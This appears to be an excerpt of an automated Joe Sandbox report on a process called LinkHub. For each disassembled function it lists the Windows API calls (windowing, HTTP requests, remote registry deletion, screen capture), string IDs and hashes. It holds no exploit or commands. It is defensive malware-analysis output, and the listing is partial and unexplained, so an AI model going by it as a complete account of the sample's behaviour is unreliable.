                                                                    • Instruction ID: f06446bb0172c2ee5505d37dae661f8a243a5666e0d8b41ea0d2f743fd69f4fb
                                                                    • Opcode Fuzzy Hash: 4754d1b9321ec70c994a064d50058da10c7557ee40277759df591ef8a734a793
                                                                    • Instruction Fuzzy Hash: 66F1CE316043449FCB54EF24C895B6EBBE5BF84310F18895DFA998B2A2CB30ED45DB52
                                                                    Function 00CF4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00D0DCD0), ref: 00CF4B18
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CF4B2A
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00D0DCD0), ref: 00CF4B4F
                                                                    • FreeLibrary.KERNEL32(00000000,?,00D0DCD0), ref: 00CF4B9B
                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00D0DCD0), ref: 00CF4C05
                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00CF4CBF
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CF4D25
                                                                    • SysFreeString.OLEAUT32(?), ref: 00CF4D4F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                    • API String ID: 354098117-199464113
                                                                    • Opcode ID: 9c8f981428e3c8c8f631b48da67656abcae679eec188eeb4108bd228ba1dd1a8
                                                                    • Instruction ID: fd2019266930a2bdc5f00396fe57843de55920fa2150581655e856e5a599d605
                                                                    • Opcode Fuzzy Hash: 9c8f981428e3c8c8f631b48da67656abcae679eec188eeb4108bd228ba1dd1a8
                                                                    • Instruction Fuzzy Hash: 85122C71A00209EFDB58DF94C884EBAB7B5FF45314F248098FA199B251D731EE46CBA1
                                                                    Function 00C7381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemCount.USER32(00D429C0), ref: 00CB3F72
                                                                    • GetMenuItemCount.USER32(00D429C0), ref: 00CB4022
                                                                    • GetCursorPos.USER32(?), ref: 00CB4066
                                                                    • SetForegroundWindow.USER32(00000000), ref: 00CB406F
                                                                    • TrackPopupMenuEx.USER32(00D429C0,00000000,?,00000000,00000000,00000000), ref: 00CB4082
                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CB408E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                    • String ID: 0
                                                                    • API String ID: 36266755-4108050209
                                                                    • Opcode ID: 770fd27295b019241f7ca5a2eda9c3a6f1b8acae159cdf975426979c083ddb0f
                                                                    • Instruction ID: 171616dd1adf774bff9fb4c98b901de938fdc04cbbb475e1ddf00e063aa125af
                                                                    • Opcode Fuzzy Hash: 770fd27295b019241f7ca5a2eda9c3a6f1b8acae159cdf975426979c083ddb0f
                                                                    • Instruction Fuzzy Hash: 22711670A44245BFEB219FA9DC89FEABF65FF05324F104206F628A62D1C7B19A10D751
                                                                    Function 00D07711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,?), ref: 00D07823
                                                                      • Part of subcall function 00C78577: _wcslen.LIBCMT ref: 00C7858A
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00D07897
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00D078B9
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D078CC
                                                                    • DestroyWindow.USER32(?), ref: 00D078ED
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C70000,00000000), ref: 00D0791C
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D07935
                                                                    • GetDesktopWindow.USER32 ref: 00D0794E
                                                                    • GetWindowRect.USER32(00000000), ref: 00D07955
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00D0796D
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00D07985
                                                                      • Part of subcall function 00C72234: GetWindowLongW.USER32(?,000000EB), ref: 00C72242
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 2429346358-3619404913
                                                                    • Opcode ID: 70a2e75a595a35cb94c87ca12008ca14e4375cd519be7ba30328371e2fa6fa57
                                                                    • Instruction ID: c29a315805e2ff831b10ea7546d05c9ead222fa57ea092898ece9e93cbae98de
                                                                    • Opcode Fuzzy Hash: 70a2e75a595a35cb94c87ca12008ca14e4375cd519be7ba30328371e2fa6fa57
                                                                    • Instruction Fuzzy Hash: A4716870944344AFD725CF58DC48BAABBE9EB89304F48441EF9898B2A1C771A906DF31
                                                                    Function 00D09B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00D09BA3
                                                                      • Part of subcall function 00D080AE: ClientToScreen.USER32(?,?), ref: 00D080D4
                                                                      • Part of subcall function 00D080AE: GetWindowRect.USER32(?,?), ref: 00D0814A
                                                                      • Part of subcall function 00D080AE: PtInRect.USER32(?,?,?), ref: 00D0815A
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00D09C0C
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00D09C17
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00D09C3A
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00D09C81
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00D09C9A
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00D09CB1
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00D09CD3
                                                                    • DragFinish.SHELL32(?), ref: 00D09CDA
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00D09DCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 221274066-3440237614
                                                                    • Opcode ID: 902df73a02f7066a7c0223fec9f57b20a639bf871f3637b0b68e9e0878683b10
                                                                    • Instruction ID: 30ddd9e0ce3cdf195796fe9169fb8005f5ec7b2f56ea0bb9557a56194b402461
                                                                    • Opcode Fuzzy Hash: 902df73a02f7066a7c0223fec9f57b20a639bf871f3637b0b68e9e0878683b10
                                                                    • Instruction Fuzzy Hash: 00617971508301AFC301EF64DC85EAFBBE9FF88750F40491EF599922A1DB309A49DB62
                                                                    Function 00CECEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CECEF5
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CECF08
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CECF1C
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CECF35
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CECF78
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CECF8E
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CECF99
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CECFC9
                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CED021
                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CED035
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00CED040
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                    • String ID:
                                                                    • API String ID: 3800310941-3916222277
                                                                    • Opcode ID: 16768ed072f6c7ee9a1c0dca9c5591600b1e7d3f4ef4e3dfb9b662ab98df186d
                                                                    • Instruction ID: 6651fda8a08bb5d9eb50b7a7f1978c88715141d73ff64f85e718da3c4bca01f9
                                                                    • Opcode Fuzzy Hash: 16768ed072f6c7ee9a1c0dca9c5591600b1e7d3f4ef4e3dfb9b662ab98df186d
                                                                    • Instruction Fuzzy Hash: B5515CB1500748BFDB219FA2CC88BAB7BBDFF48744F04441AF95AD6250D734DA46AB60
                                                                    Function 00D08FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00D066D6,?,?), ref: 00D08FEE
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D08FFE
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09009
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09016
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00D09024
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09033
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00D0903C
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09043
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D066D6,?,?,00000000,?), ref: 00D09054
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00D10C04,?), ref: 00D0906D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00D0907D
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00D0909D
                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00D090CD
                                                                    • DeleteObject.GDI32(00000000), ref: 00D090F5
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00D0910B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: f4aaada51ff47ba29949aaa08d466fa6b00a6cde34914d4c9b998cbe529ca41a
                                                                    • Instruction ID: f896ece240c6cfd4f177014fabda7570361f22aa5b588208d6cc93097c70616b
                                                                    • Opcode Fuzzy Hash: f4aaada51ff47ba29949aaa08d466fa6b00a6cde34914d4c9b998cbe529ca41a
                                                                    • Instruction Fuzzy Hash: 78412775600308BFDB119FA5DC88FAABBB9EF89711F148059F909D72A1DB709941CB30
                                                                    Function 00CFC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC154
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CFC1D2
                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00CFC26A
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC2DE
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00CFC2FC
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00CFC352
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CFC364
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CFC382
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00CFC3E3
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFC3F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                    • API String ID: 146587525-4033151799
                                                                    • Opcode ID: b1b951e7cc5d6f09c9104df1b9b1aad6ba0fb02627e9f8a4bbffe67af39ec9a0
                                                                    • Instruction ID: 1f64b495f042861010c817f46a70fb2776eafac5a616b948e9deff75f1b58319
                                                                    • Opcode Fuzzy Hash: b1b951e7cc5d6f09c9104df1b9b1aad6ba0fb02627e9f8a4bbffe67af39ec9a0
                                                                    • Instruction Fuzzy Hash: B1C17B35204209AFD754DF64C5C4B6ABBE1BF84308F14C59CF56A8B2A2CB31ED46CB92
                                                                    Function 00CF2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 00CF3035
                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CF3045
                                                                    • CreateCompatibleDC.GDI32(?), ref: 00CF3051
                                                                    • SelectObject.GDI32(00000000,?), ref: 00CF305E
                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CF30CA
                                                                    • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CF3109
                                                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CF312D
                                                                    • SelectObject.GDI32(?,?), ref: 00CF3135
                                                                    • DeleteObject.GDI32(?), ref: 00CF313E
                                                                    • DeleteDC.GDI32(?), ref: 00CF3145
                                                                    • ReleaseDC.USER32(00000000,?), ref: 00CF3150
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                    • String ID: (
                                                                    • API String ID: 2598888154-3887548279
                                                                    • Opcode ID: 6683d4e8cef7a9f9c414295f39a25a4c33623098bf55dffdc4e6347ba9197cbd
                                                                    • Instruction ID: 63ff0ef48aa933b34f91ff647fa5c920cf2d8083214071f3ded9a8631e1d7cf1
                                                                    • Opcode Fuzzy Hash: 6683d4e8cef7a9f9c414295f39a25a4c33623098bf55dffdc4e6347ba9197cbd
                                                                    • Instruction Fuzzy Hash: 9061C275D00219AFCF14CFE4D884AAEBBB6FF48310F20851AE559A7350D771AA51DFA0
                                                                    Function 00D0A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00D0A990
                                                                    • GetSystemMetrics.USER32(00000011), ref: 00D0A9A7
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00D0A9B3
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00D0A9C9
                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00D0AC15
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D0AC33
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D0AC54
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00D0AC73
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00D0AC95
                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00D0ACBB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                    • String ID: @
                                                                    • API String ID: 3962739598-2766056989
                                                                    • Opcode ID: 9c7f77ad0f34bc93c5bbf93ecf907c70d3434f9e194ad82182124b3ae2d10ea1
                                                                    • Instruction ID: 72c817e2f2c9dfc70c54ddf69263cd2e66413719eea9d8048a947c44f718f04a
                                                                    • Opcode Fuzzy Hash: 9c7f77ad0f34bc93c5bbf93ecf907c70d3434f9e194ad82182124b3ae2d10ea1
                                                                    • Instruction Fuzzy Hash: 14B17935600319EFDF14CF6DC984BAE7BB2BF44704F198069EC49AB295D770A980CB61
                                                                    Function 00CD52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00CD52E6
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CD5328
                                                                    • _wcslen.LIBCMT ref: 00CD5339
                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00CD5345
                                                                    • _wcsstr.LIBVCRUNTIME ref: 00CD537A
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CD53B2
                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 00CD53EB
                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00CD5445
                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00CD5477
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD54EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                    • String ID: ThumbnailClass
                                                                    • API String ID: 1311036022-1241985126
                                                                    • Opcode ID: de00546ed024638e0b27099ccda48d2b0cfb62956bcc98d48724ca3df6ee74ba
                                                                    • Instruction ID: b35a55a0d36bffdc571f02ce48fc2c1faf2dfa2a55ea49dec19c0ed1a1e84214
                                                                    • Opcode Fuzzy Hash: de00546ed024638e0b27099ccda48d2b0cfb62956bcc98d48724ca3df6ee74ba
                                                                    • Instruction Fuzzy Hash: 7E91F971104B07AFD705DF24D994BAAB7A9FF00304F50451BFBAA82291EB31EE55CB91
                                                                    Function 00D0976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00C724B0
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D097B6
                                                                    • GetFocus.USER32 ref: 00D097C6
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00D097D1
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00D09879
                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D0992B
                                                                    • GetMenuItemCount.USER32(?), ref: 00D09948
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00D09958
                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D0998A
                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D099CC
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D099FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                    • String ID: 0
                                                                    • API String ID: 1026556194-4108050209
                                                                    • Opcode ID: 634a92d885973a6f876aa302b83a7788691333b2b38d4800dbd6a4a8a1114ee3
                                                                    • Instruction ID: 75bc1cc8be95add79a9033834700f76e587db990fb14bb0e13aca27bbef46eed
                                                                    • Opcode Fuzzy Hash: 634a92d885973a6f876aa302b83a7788691333b2b38d4800dbd6a4a8a1114ee3
